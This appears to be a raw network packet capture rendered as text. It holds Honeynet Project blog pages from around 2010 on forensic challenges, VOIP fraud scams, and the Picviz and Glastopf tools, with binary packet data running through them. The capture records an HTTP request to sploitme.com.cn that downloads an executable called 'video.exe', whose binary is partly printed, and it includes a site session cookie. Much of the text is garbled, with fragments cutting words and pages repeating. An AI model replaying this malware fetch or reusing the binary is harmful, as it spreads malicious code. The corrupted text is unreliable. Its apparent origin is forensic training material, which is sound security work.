    The first challenge (of s;=K'_RT5E\@@r PWbՃPSleveral for 2010) will be posted on our Forensic Challenges web site on Monday, January 18th 2010. We will be open to submissions for about two weeks and announce the winners by February 15th 2010. This year, we will also award the top three submissions with prizes! Please check the web site on Monday, January 18th 2010 for further details...



    Christian Seifert

    Chief Communications Officer
    The Honeynet Project

    Italian Chapter updates

    Main blog - Wed, 12/16/2009 - 09:41
    Folks, I would like to inform you all about our recent activities that we are attempting to achieve. First of all, we have totally rebuilt our web site. This new ones aim to be a central repository of all the (external/internal) news concerning botnets (mainly) and malwares (secondary). We will use the blog for posting abou;=K'<<RT5'_E(6@6 @rWPՃP3;=K<<RT5'_E(7@6 @rWPՃP(P;=KЫ'_RT5E]@@r PWՃP4t our project developments, and for commenting/reporting interesting news concerning the field that we are currently treating, so you can now add a new entry to your feeds reader :)

    VOIP phoneynet : PART 3 "WHAT WOULD CROOKS DO WITH A COMPROMISED VOIP GATEWAY ANYWAY?"

    Australian Blog - Sat, 12/05/2009 - 13:55

    There are quite a few ways that a criminal can make use of a compromised VOIP server. It's important to realize that the criminal mind is very imaginative, and there will be many motives and scams that we have not even imagined yet, much less experienced.
    When looking at these types of questions, I think it helps to have the notion of motive in the back of your mind. This may sound obvious, but I find this helps answer the question 'what would a person or group with this motivation want with a compromised VOIP system?'.

    Here are some;=K)'_RT5E^@@r PWՃP4 potential motives. While I won't go into every possible scenario, it's really not hard to imagine that the full control of target's phone system would be handy for people with any of these motives.

  • Financial gain
  • Political
  • Religious
  • Reputation and ego of the hacker
  • Intellectual Property theft, Trade Secrets
  • Espionage
  • Retribution, commercial or personal
  • Vandalist, miscreant activity (bored youth..)
  • I got some great local and international feedback on incidents from readers of Part 1 and Part 2 of this blog series (Thank you everyone). Most of these incidents seem to fall into the 'Financial gain' motive group, so I'll give two examples of common attacks which are currently seen in AU and overseas, and a possible future threat.

    Cheap overseas calls / calling cards.
    One of the most common uses for hacked VOIP servers is to simply make unauthorized calls, and there have been incidents of hacked VOIP servers being used in relation to calling card scams to do just this. This is not to say that all cheap calling card operations are scams; most, I'm sure, are legitimate.
    Here is a brief overview of a simple version of the scam:

  • The crook controls a hacked VOIP system in (say) Australia. This ;=K<<RT5'_E(8@6 @rWPՃBP;=K'_RT5E_@@r PWBՃPt~means that they can accept and redirect calls, and essentially control every aspect of that phone system.
  • The crook sells 'calling cards' to citizens of another country that live in, or are visiting Australia. The card allows them to call home at ridiculously cheap rates, a tiny fraction of the cost of a legitimate overseas call.
  • The buyer of the calling card is instructed to call a local (probably legitimate) number in Australia and then enter in the international number they are trying to reach. The crook then reroutes these calls through VOIP to the hacked system, which then makes the international call. This functionality could potentially be turned off periodically to evade being uncovered, and could even be configured to only use the hacked VOIP server for calls to a specific set of countries.
  • The buyer of the calling card of course could not be aware that the call was routed through a hacked VOIP system, they are just happy to have spoken to family and friends at a cheap rate.
  • Note also that it is entirely possible for the calls to be re-routed through an entire chain of hacked VOIP servers in more 2 or 3 different countries, effectively 'laundering the call' by making it harder to track down if an investigation is ever launched. Jurisdictional/timezone/culture and language differences are some of the most challenging hurdles faced by cybercrime investigators, and the;=KN'_RT5E`@@r PWՃP crooks know how to take advantage of this (I aim to explore these aspects in a later instalment of this blog series)
  • The important thing is that the calling card holder just got an overseas call for the cost of a local call, plus the crook's margin, so they are not really the victim. The owner of the hacked VOIP server however may (or may not, depending on the size of a normal bill) realize that something is amiss when they get their next phone bill, as it was their system that made the calls. We have heard a few stories of this occurring (in Australia and abroad), where the victim's telephone bill inexplicably sky-rocketed by over $20,000 in one case here in Australia!

    Premium rate number calling
    This attack predates VOIP by many years, first being used on standard corporate PABX systems. VOIP has made this much more lucrative for the crooks due to the call volumes it allows.

    The scam is fairly simple.

  • Crook has control of hacked VOIP system(s) for which the victim gets bills for on a monthly basis. This VOIP system may belong to a corporate entity, and so may be capable of making many concurrent calls.
  • The crook has a premium rate 1900 number, for which they collect revenue on a weekly or daily basis.
  • Crook gets the hacked VOIP system to make multiple, repeated calls to the 1900 number, thus adding to the account of the 1900 number, at the expe;=KP<<RT5'_E(9@6 @rWPՃPGET /c;=K_'_RT5Ea@@r PWՃP` nse of the owner of the hacked VOIP system.
  • Crook collects the revenue from the 1900 number every day/week until someone notices.
  • In this case, the victim may not realise they have been hacked until they receive the bill at the end of the month, by which time the crook has made off with potentially hundreds of thousands of dollars over at least 2 weekly collection periods.
    Note also that there is a money trail here, so the crook must also engage in other crime types such as identity theft, money laundering etc to actually get cash out.

    Future threat – Denial of Service
    The motive behind this attack could probably be any of the ones listed above.
    I've not heard of any instances of this, but it's worthwhile considering how we would deal with the threat of Denial of Service on voice systems. This could be as simple as an attacker using a hacked VOIP system to dial multiple concurrent calls into a target's phone numbers (VOIP, or PSTN for that matter), which would exhaust all of the available connections, even ISDN/PSTN indials. Remember that SIP, the predominant VOIP protocol, is UDP (connectionless) and, being an Internet protocol, could be emulated/faked, so perhaps a hacked VOIP system wouldn't even be required to effect a DOS.
    This area needs much more research and consideration from authorities much better funded and capable than us, and yes ;=Kɓ'_RT5Eb@@r PW"ՃPwe are more than happy to brainstorm ideas on threat scenarios and mitigations with the appropriate agencies/researchers, just contact us.

    Given the importance of voice systems both for commerce and its use in emergency situations, it's imperative that threat scenarios are identified and risks are mitigated to within acceptable tolerances. I hope this blog gives some background info to organizations who are starting to consider the threats they face, and put in place appropriate controls and response plans.

    Next in the blog series is PART 4 "HOW BEST TO PROTECT AGAINST VOIP THREATS". Feel free to contact me at ben@honeynet.org.au with any feedback, or input into the next one.

    Nepenthes Pharm

    Main blog - Sun, 11/29/2009 - 18:32
    Parvinder Bhasin asked us to post an announcement about his new tool. While not officially a tool developed by the Honeynet Project, we thought you should know about some of the great work he is doing. N;=K9<<RT5'_E(:@6 @rWPՃPp DIE;=KO'_RT5Ec@@r PWšՃPjJepenthes PHARM is a perfect companion to your Nepenthes honeypot installations. PHARM is an Open Source client/server and web portal package, which provides central reporting and analysis of your distributed Nepenthes based honeypots.

    Know Your Tools: use Picviz to find attacks

    Main blog - Thu, 11/26/2009 - 17:27
    We are very excited to announce the publication of our first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

    The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

    Paper Abstract
    Picviz is a parallel coordinates plotter which enables easy scripting from various input (tcpdump, syslog, iptables logs, apache logs, etc..) to visualize data and discover interesting aspects of that data quickly. Picviz uncovers previously hidden data that is ;=K&'_RT5Ed@@r PWbՃPodifficult to identify with traditional analysis methods.

    In the first paper of our new Know Your Tools series, Sebastien Tricaud from the French Honeynet Project Chapter and Victor Amaducci from the University of Campinas, focus on Picviz. After a brief overview on parallel coordinates, Picviz architecture, and installation procedure, three real-world examples are presented that illustrate how to identify attacks from large amounts of data: Picviz is used to analyze SSH logs, Apache access logs and network traffic. With these examples, it is demonstrated how Picviz can find attacks that previously have been hidden.


    Recent additions to Picviz GUI have been made by Victor Amaducci under the mentorship of Sebastien Tricaud as part of the Google Summer of Code program 2009. The most recent version of Picviz is freely available for download from its project site at http://www.wallinfire.net/picviz and support can be sought from the Picviz mailing list at http://www.wallinfire.net/cgi-bin/mailman/listinfo/picviz..

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:49

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:34

    RE-Google Architecture

    Main blog - Sun, 11/15/2009 - 22:31

    RE-Google - or how Grandma started Reverse Engineering

    Main blog - Sun, 11/15/2009 - 22:20
    Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

    Glastopf

    Main blog - Sat, 10/17/2009 - 19:19
    Web sites are hacked all the time. Web application, database, and cross-site scripting vulnerabil;=K <<RT5'_E(<@6 @rWPՃBP;=KI '_RT5Eg@@r PWBՃPities expose a large attack surface that can be exploited to, among others, deface the web site, send spam, convert web site into bots, and serve drive-by-download attacks. Glastopf is a low-interaction honeypot that emulates a vulnerable web server hosting many web pages and web applications with thousands of vulnerabilities. Glastopf is easy to setup and once indexed by search engines, attacks will pour in by the thousands daily. Glastopf has been developed as part of the 2009 Google of Summer Code by student Lukas Rist (and mentored by Thorsten Holz of the German Honeynet Project Chapter). It can be downloaded from the Glastopf trac site at http://trac.glastopf.org/trac. More information on Glastopf can be found on the project site at http://glastopf.org/.
    Syndicate content
    ;=K6f <<RT5'_E(=@6 @rWPՃPŋGET /c;=KƂ ;;'_RT5E-i@f@r PW駚ՃPt0 ;=K 66'_RT5E(j@j@r PW鬚ՃP;=Kǚ <<RT5'_E(>@6 @rWPՃPņ;=K <<RT5'_E(?@6 @rWPՃP;=K <<RT5'_E(@@6 @rWPՃPGET /c;=K/ 66'_RT5E(k@i@r PW魚ՃP;=K '_EA  /xU  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=K '_EB  /wV  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=K# '_EC  /vW  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=K '_ED  /uX  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=KTTRT5'_EFEg 52eͪwwwgoogle-analyticscom;=KA'_RT5El@$ 5ͪwwwgoogle-analyticscom #www-google-analyticslgooglecom6OJ}Mf6OJ}Md6OJ}Me;=K>>RT5'_E0F@Q J}MfXP;ypV;=K::'_RT5E,m@mJ}Mf PX@;z`;=Kk<<RT5'_E(H@Q J}MfXP;z@P ;=KdRT5'_EI@N J}MfXP;z@PoGET /__utm.gif?utmwv=4.6.5&utmn=1265451123&utmhn=www.honeynet.org&utmcs=utf-8&utmsr=1088x729&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=6.0%20r79&utmdt=Honeynet%20Project%20Blog%20%7C%20The%20Honeynet%20Project&utmhid=1706076767&utmr=-&utmp=%2F&utmac=UA-372404-7&utmcc=__utma%3D121888786.1305690527.1264085162.1265310286.1265310375.6%3B%2B__utmz%3D121888786.1264085162.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B HTTP/1.1 Accept: */* Referer: http://www.honeynet.org/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google-analytics.com Connection: Keep-Alive ;=K66'_RT5E(n@pJ}Mf PX@>P=;=K# pp'_RT5Ebo@5J}Mf PX@>PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:51 GMT Content-Length: 35 Pragma: no-cache Expires: Wed, 19 Apr 2000 11:44:00 GMT Last-Modified: Wed, 21 Jan 2004 19:50:30 GMT Content-Type: image/gif Server: Golfe Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate X-XSS-Protection: 0 ;=K]$ YY'_RT5EKp@KJ}Mf PXA<>PwGIF89a,D;;=K& <<RT5'_E(K@Q J}MfXP>A_P LGET /c;=K nn'_E`L4  
LT8Y) FHEPFCELEHFCEPFFFACACACACACACABN   ;=K\5nn'_E`M3  LT8Y) FHEPFCELEHFCEPFFFACACACACACACABN   ;=KIlnn'_E`N2  LT8Y) FHEPFCELEHFCEPFFFACACACACACACABN   ;=K nn'_E`O1  LU8Y( FHEPFCELEHFCEPFFFACACACACACACABN   ;=K> nn'_E`P0  L4Z) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=KXnn'_E`Q/  L4Z) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=K nn'_E`R.  L4Z) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=K nn'_E`S-  L4Z( ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=K66'_RT5E(q@su83 PR FP/;=KM<<RT5'_E(T@ 83RPF PKGET /c;=K66'_RT5E(r@st83 PS P;=K<<RT5'_E(U@ 83SP PK}GET /c;=KO7 '_EV  ‚[  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACAAASMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K7 '_EW  N\  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA ABACFPFPENFDECFCEPFHFDEFFPFPACABSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=KI '_EX  ]  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA ABACFPFPENFDECFCEPFHFDEFFPFPACABSMB%00VA\MAILSLOT\BROWSE `WORKGROUPXj 8FD12EDD2DC1462;=K66'_RT5E(s@sr84 PTD0IaAPz;=Kw<<RT5'_E(Y@ 84TPIaAD1Pg;=K5<<RT5'_E(Z@ 83RPF P+ DIE;=K<<RT5'_E([@ 83SP P;=K3'_E\  3^  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABOSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U;=K1 <<RT5'_E(]@ 84TPIaAD1Pg;=KP2 66'_RT5E(t@sq84 PTD1IaBPy;=K >>RT5'_E0^@~ 84ZPZp;=KI ::'_RT5E,u@sl84 PZ{ Z`z;=Kt <<RT5'_E(`@ 84ZPZ{ PF;=KKRT5'_Ea@ 84ZPZ{ P wGET /fg/load.php?e=3 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KL66'_RT5E(v@so84 PZ{ ZPu;=K_'_RT5Ew@m84 PZ{ ZPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:07:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. 
$PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGE;=Kj'_RT5E{@m84 PZ{"ZPF%t&uV҉UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMB;=Kzk'_RT5E|@m84 PZ{(JZPOFMu4$MԋUA IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@;=Kl'_RT5E}@m84 PZ{-ZP%a@%Da@%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| ;=Kq<<RT5'_E(e@ 84ZPZ{(JP<;=K!r'_RT5E~@m84 PZ{3ZP^@@AB D4@"AB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsignalsp;=K'_RT5E@n84 PZ{9NZPLrintfstrlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.org;=K<<RT5'_E(f@~ 84ZPZ{3P<;=K<<RT5'_E(g@} 84ZPZ{3P;=K<<RT5'_E(h@| 84ZPZ{=PԀ;=K<<RT5'_E(i@{ 84ZPZ{=Pv;=K>>RT5'_E0s@6Y 
@r]P\hpn;=KU::'_RT5E,@P@r P]\h`i;=K,Y<<RT5'_E(u@6_ @r]P\hP5 DIEGE;=KQ6RT5'_Ev@4 @r]P\hPGET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.honeynet.org Connection: Keep-Alive Cookie: SESS0f916077214db25d3c25b38417a57722=c3c14637ee4fa2f3ced7dfe9b7f77eb9; __utma=121888786.1305690527.1264085162.1265310286.1265310375.6; __utmz=121888786.1264085162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=121888786.1.10.1265310375 ;=K766'_RT5E(@S@r P]\hPZ;=K!r'_RT5E@@r P]\hPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:07:46 GMT Server: Apache X-Powered-By: PHP/4.3.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 02 Feb 2010 19:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 6c34 Honeynet Project Blog | The Honeynet Project
    To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

    Honeynet Project Blog

    First challenge of the Forensic Challenge 2010 has been posted.

    Main blog - Mon, 01/18/2010 - 07:21
    We have just posted the first challenge of the Forensic Challenge 2010. The first challenge deals with a network attack. It has been provided by Tillmann Werner from the Giraffe Chapter. It is accessible at https://honeynet.org/node/504. Submissions are due on Monday, February 1st 2010 and results will be released on Monday, February 15th 2010. The top three submissions will be awarded with small prizes. Check it out!

    Challenge 1 of the Forensic Challenge 2010 - pcap attack trace

    Main blog - Mon, 01/18/2010 - 06:18
    Forensic Challenge 2010 Challenge 1 - pcap attack trace - (provided by Tillmann Werner from the Giraffe Chapter) is to investigate a network attack.

    Send submissions (please use the MS word submission template or the Open Office submission template) forensicchallenge2010@honeynet.org no later then 17:00 EST, Monday, February 1st 2010. Results will be released on Monday, February 15th 2010. Small prizes will be awarded to the top three submissions.


    Skill Level: Intermediate

    The Challenge:

    A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

    1. Which systems (i.e. IP addresses) are involved? (2pts)
    2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
    3. How many TCP sessions are contained in the;=K <<RT5'_E(|@6X @r]P\h"PI FHEPF;=KI '_RT5E@@r P]"\hP dump file? (2pts)
    4. How long did it take to perform the attack? (2pts)
    5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
    6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
    7. What specific vulnerability was attacked? (2pts)
    8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
    9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
    10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
    11. Do you think this is a manual or an automated attack? Why? (2pts)
    Download:
    attack-trace.pcap_.gz Sha1: 0f5ddab19034b2656ec316875b527d9bff1f035f

    Announcing the Honeynet Project Forensic Challenge 2010

    Main blog - Tue, 01/12/2010 - 17:34

    I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members.


    It has been several years since we provided Forensic Challenges and with the Forensic Challenge 2010, we will provide desperately needed upgrades. The Forensic Challenge 2010 will include a mixture of server-side attacks on the latest operating systems and services, attacks on client-side attacks that emerged in the past few years, attacks on VoiP systems, web applications, etc. At the end of challenge, we will provide a sample solution created by our members using the state-of-the-art tools that are publicly available, such as libemu and dionaea.


    The first challenge (of s;=Kq <<RT5'_E(~@6V @r]P\hbP DIE;=K& '_RT5E@@r P]b\hPeveral for 2010) will be posted on our Forensic Challenges web site on Monday, January 18th 2010. We will be open to submissions for about two weeks and announce the winners by February 15th 2010. This year, we will also award the top three submissions with prizes! Please check the web site on Monday, January 18th 2010 for further details...



    Christian Seifert

    Chief Communications Officer
    The Honeynet Project

    Italian Chapter updates

    Main blog - Wed, 12/16/2009 - 09:41
    Folks, I would like to inform you all about our recent activities that we are attempting to achieve. First of all, we have totally rebuilt our web site. This new ones aim to be a central repository of all the (external/internal) news concerning botnets (mainly) and malwares (secondary). We will use the blog for posting abou;=K <<RT5'_E(@6U @r]P\hPP GET /f;=KU'_RT5E@@r P]\hPt our project developments, and for commenting/reporting interesting news concerning the field that we are currently treating, so you can now add a new entry to your feeds reader :)

    VOIP phoneynet : PART 3 "WHAT WOULD CROOKS DO WITH A COMPROMISED VOIP GATEWAY ANYWAY?"

    Australian Blog - Sat, 12/05/2009 - 13:55

    There are quite a few ways that a criminal can make use of a compromised VOIP server. Its important to realize that the criminal mind is very imaginative, and there will be many motives and scams that we have not even imagined yet, much less experienced.
    When looking at these types of questions, I think it helps to have the notion of motive in the back of your mind. This may sound obvious, but I find this helps answer the question 'what would a person or group with this motivation want with a compromised VOIP system?'.

    Here are some;=K'_RT5E@@r P]\hP potential motives. While I won't go into every possible scenario, it's really not hard to imagine that the full control of target's phone system would be handy for people with any of these motives.

  • Financial gain
  • Political
  • Religious
  • Reputation and ego of the hacker
  • Intellectual Property theft, Trade Secrets
  • Espionage
  • Retribution, commercial or personal
  • Vandalist, miscreant activity (bored youth..)
  • I got some great local and international feedback on incidents from readers of Part 1 and Part 2 of this blog series (Thank you everyone). Most of these incidents seem to fall into the 'Financial gain' motive group, so I'll give two examples of a common attacks which are currently seen in AU and overseas, and a possible future threat.

    Cheap overseas calls / calling cards.
    One of the most common uses for hacked VOIP servers is to simply make unauthorized calls, and there have been incidents of hacked VOIP servers being used in relation to calling card scams to do just this. This is not to say that all cheap calling cards operations are scams, most I'm sure are legitimate.
    Here is a brief overview of a simple version of the scam:

  • The crook controls a hacked VOIP system in (say) Australia. This ;=K&<<RT5'_E(@6R @r]P\hBP) DIEGE;=K"'_RT5E@@r P]B\hPmeans that they can accept and redirect calls, and essentially control every aspect of that phone system.
  • The crook sells 'calling cards' to citizens of another country that live in, or are visiting Australia. The card allows them to call home at ridiculously cheap rates, a tiny fraction of the cost of a legitimate overseas call.
  • The buyer of the calling card is instructed to call a local (probably legitimate) number in Australia and then enter in the international number they are trying to reach. The crook then reroutes these calls through VOIP to the hacked system, which then makes the international call. This functionality could potentially be turned off periodically to evade being uncovered, and could even be configured to only use the hacked VOIP server for calls to a specific set of countries.
  • The buyer of the calling card of course could not be aware that the call was routed through a hacked VOIP system, they are just happy to have spoken to family and friends at a cheap rate.
  • Note also that it is entirely possible for the calls to be re-routed through an entire chain of hacked VOIP servers in more 2 or 3 different countries, effectively 'laundering the call' by making it harder to track down if an investigation is ever launched. Jurisdictional/timezone/culture and language differences are some of the most challenging hurdles faced by cybercrime investigators, and the;=KFR'_RT5E@@r P]\hP( crooks know how to take advantage of this (I aim to explore these aspects in a later instalment of this blog series)
  • The important thing is that the calling card holder just got an overseas call for the cost of a local call, plus the crooks margin, so they are not really the victim. The owner of the hacked VOIP server however may (or may not depending the size of a normal bill) realize that something is amiss when they get their next phone bill, as it was their system that made the calls. We have heard a few stories of this occurring (in Australia and abroad), where the victim's telephone bill inexplicably sky-rocketed by over $20,000 in one case here in Australia!

    Premium rate number calling
    This attack predates VOIP by many years, first being used on standard corporate PABX systems. VOIP has made this much more lucrative for the crooks due to the call volumes it allows.

    The scam is fairly simple.

  • Crook has control of hacked VOIP system(s) for which the victim gets bills for on a monthly basis. This VOIP system may belong to a corporate entity, and so may be capable of making many concurrent calls.
  • The crook has a premium rate 1900 number, for which they collect revenue on a weekly or daily basis.
  • Crook gets the hacked VOIP system to make multiple, repeated calls to the 1900 number, thus adding to the account of the 1900 number, at the expe;=KU<<RT5'_E(@6Q @r]P\hP~wwwh;=KE'_RT5E@@r P]\hP&nse of the owner of the hacked VOIP system.
  • Crook collects the revenue from the 1900 number every day/week until someone notices.
  • In this case, the victim may not realise they have been hacked until they receive the bill at the end of the month, by which time the crook has made off with potentially hundreds of thousands of dollars over at least 2 weekly collection periods.
    Note also that there is a money trail here, so the crook must also engage in other crime types such as identity theft, money laundering etc to actually get cash out.

    Future threat – Denial of Service
    The motive behind this attack could probably be any of the ones listed above.
    I've not heard of any instances of this, but it's worthwhile considering how we would deal with the threat of Denial of Service on Voice systems. This could be as simple as an attacker using a hacked VOIP system to dial multiple concurrent calls into a target's phone numbers (VOIP, or PSTN for that matter) which would exhaust all of the available connections, even ISDN/PSTN indials??. Remember that SIP, the predominant VOIP protocol is UDP (connectionless) and being an Internet protocol could be emulated/faked, so perhaps a hacked VOIP system wouldn't even be required to effect a DOS.
    This area needs much more research and consideration from authorities much better funded and capable than us, and yes ;=Ko<<RT5'_E(@6N @r]P\h"PP~;=KA '_RT5E@@r P]"\hPwe are more than happy to brainstorm ideas on threat scenarios and mitigations with the appropriate agencies/researchers, just contact us.

    Given the importance of voice systems both for commerce and its use in emergency situations, it's imperative that threat scenarios are identified and risks are mitigated to within acceptable tolerances. I hope this blog gives some background info to organizations who are starting to consider the threats they face, and put in place appropriate controls and response plans.

    Next in the blog series is PART 4 "HOW BEST TO PROTECT AGAINST VOIP THREATS". Feel free to contact me at ben@honeynet.org.au with any feedback, or input into the next one.

    Nepenthes Pharm

    Main blog - Sun, 11/29/2009 - 18:32
    Parvinder Bhasin asked us to post an announcement about his new tool. While not officially a tool developed by the Honeynet Project, we thought you should know about some of the great work he is doing. N;=Kg '_RT5E@@r P]$\hPcepenthes PHARM is a perfect companion to your Nepenthes honeypot installations. PHARM is an Open Source client/server and web portal package, which provides central reporting and analysis of your distributed Nepenthes based honeypots.

    Know Your Tools: use Picviz to find attacks

    Main blog - Thu, 11/26/2009 - 17:27
    We are very excited to announce the publication of our first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

    The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

    Paper Abstract
    Picviz is a parallel coordinates plotter which enables easy scripting from various input (tcpdump, syslog, iptables logs, apache logs, etc..) to visualize data and discover interesting aspects of that data quickly. Picviz uncovers previously hidden data that is ;=Kj <<RT5'_E(@6L @r]P\h*bPn FHEPF;=KB '_RT5E@@r P]*b\hPdifficult to identify with traditional analysis methods.

    In the first paper of our new Know Your Tools series, Sebastien Tricaud from the French Honeynet Project Chapter and Victor Amaducci from the University of Campinas, focus on Picviz. After a brief overview on parallel coordinates, Picviz architecture, and installation procedure, three real-world examples are presented that illustrate how to identify attacks from large amounts of data: Picviz is used to analyze SSH logs, Apache access logs and network traffic. With these examples, it is demonstrated how Picviz can find attacks that previously have been hidden.


    Recent additions to Picviz GUI have been made by Victor Amaducci under the mentorship of Sebastien Tricaud as part of the Google Summer of Code program 2009. The most recent version of Picviz is freely available for download from its project site at http://www.wallinfire.net/picviz and support can be sought from the Picviz mailing list at http://www.wallinfire.net/cgi-bin/mailman/listinfo/picviz..
